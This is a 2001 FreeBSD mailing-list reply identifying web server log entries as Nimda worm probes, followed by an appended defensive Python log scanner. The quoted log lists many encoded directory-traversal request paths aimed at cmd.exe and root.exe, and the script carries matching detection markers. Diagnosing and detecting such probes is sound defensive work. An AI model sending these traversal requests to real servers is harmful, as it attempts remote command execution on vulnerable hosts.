Date: Tue, 13 Nov 2001 23:00:56 -0500
From: Louis LeBlanc <leblanc+freebsd@keyslapper.org>
To: freebsd-questions@FreeBSD.org, freebsd-questions@FreeBSD.org
Subject: Re: Do these errors mean my system is comprimised?
Message-ID: <20011114040055.GB25941@keyslapper.org>
In-Reply-To: <0111131938440F.60958@chip.wiegand.org>
References: <0111131938440F.60958@chip.wiegand.org>
On 11/13/01 07:38 PM, Chip sat at the `puter and typed:
> I found the following on my apache/freebsd/php/mysql server in my log after
> running analog -
> Looks like someone planted something that wants NT to work correctly -
>
> 111: /scripts/..%255c../winnt/system32/cmd.exe
> 111: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> 106: /scripts/..%5c../winnt/system32/cmd.exe
> 106: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
> 66: /scripts/root.exe
> 66: /scripts/root.exe?/c+dir
> 64: /MSADC/root.exe
> 64: /MSADC/root.exe?/c+dir
> 62: /c/winnt/system32/cmd.exe
> 62: /c/winnt/system32/cmd.exe?/c+dir
> 59: /d/winnt/system32/cmd.exe
> 59: /d/winnt/system32/cmd.exe?/c+dir
> 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> 56: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
> 56: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> 55: /scripts/..%c1%1c../winnt/system32/cmd.exe
> 55: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> 54: /scripts/winnt/system32/cmd.exe
> 54: /scripts/winnt/system32/cmd.exe?/c+dir
> 54: /scripts/..%c1%9c../winnt/system32/cmd.exe
> 54: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> 54: /scripts/..%c0%af../winnt/system32/cmd.exe
> 54: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> 51: /scripts/..%252f../winnt/system32/cmd.exe
> 51: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir

This is the footprint of the Nimda virus *trying* to infect your system.
You can find links to specific info on what Nimda tries to do on Google,
if you want to sort thru a million hits.
You can also get info on how an Apache installation can handle these (or
not handle them) at http://www.keyslapper.org/modules/

Look for the Apache::Nimda page; even if you don't want to report it to
abuse and SecurityFocus, there are config ideas that will help you reduce
the impact on your log file size.

Also, look for the Apache::404 module. It will handle those misses and
notify you via email - once per period for each URL. It can help you keep
track of Nimda's impact on your server, and keep dead links tied up.

Enough of the shameless plug. Check it out.

HTH
Lou
--
Louis LeBlanc                          leblanc@keyslapper.org
Fully Funded Hobbyist, KeySlapper Extrordinaire :)
http://www.keyslapper.org

Bershere's Formula for Failure:
There are only two kinds of people who fail: those who listen to
nobody... and those who listen to everybody.
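A defender's check for the probe pattern Lou identifies, as an added example that is not part of the original thread or of the keyslapper.org modules: it scans Apache access-log lines (constructed sample lines, not Chip's log), normalizes the double-encoded traversal so the cmd.exe/root.exe requests are counted per path and per client the way the analog report above does, and flags any such request that did not get a 404, since on an Apache/FreeBSD host these IIS-only probes should never succeed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache common log format (not from the original
# message); the request paths follow the probe shapes in Chip's analog report.
SAMPLE_LOG = """\
10.0.0.7 - - [13/Nov/2001:19:01:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
10.0.0.7 - - [13/Nov/2001:19:01:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
10.0.0.9 - - [13/Nov/2001:19:02:40 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
10.0.0.9 - - [13/Nov/2001:19:02:41 -0500] "GET /index.html HTTP/1.0" 200 1024
10.0.0.11 - - [13/Nov/2001:19:05:00 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512
"""

# client, request path and status code from a common-log-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

# Targets every Nimda probe in the report above ends in; both are IIS-only.
NIMDA_MARKERS = ("/winnt/system32/cmd.exe", "/root.exe")

def normalize_path(raw_path):
    """Drop the query string and percent-decode twice, so the double-encoded
    ..%255c and the single-encoded ..%5c collapse to the same traversal text."""
    path = raw_path.split("?", 1)[0]
    return unquote(unquote(path)).lower()

def is_nimda_probe(raw_path):
    return any(marker in normalize_path(raw_path) for marker in NIMDA_MARKERS)

def scan_log(text):
    """Return (hits per raw path, hits per client, probes that were NOT answered 404)."""
    per_path, per_client, non_404 = {}, {}, []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed or unexpectedly formatted lines
        client, raw_path, status = m.group(1), m.group(2), int(m.group(3))
        if not is_nimda_probe(raw_path):
            continue
        per_path[raw_path] = per_path.get(raw_path, 0) + 1
        per_client[client] = per_client.get(client, 0) + 1
        if status != 404:
            # A probe that did not miss deserves a look at what actually answered it.
            non_404.append((client, raw_path, status))
    return per_path, per_client, non_404

if __name__ == "__main__":
    paths, clients, suspicious = scan_log(SAMPLE_LOG)
    for path, n in sorted(paths.items(), key=lambda kv: -kv[1]):
        print(f"{n}: {path}")
    print("clients:", clients)
    print("probes not answered 404:", suspicious)
```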
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011114040055.GB25941>
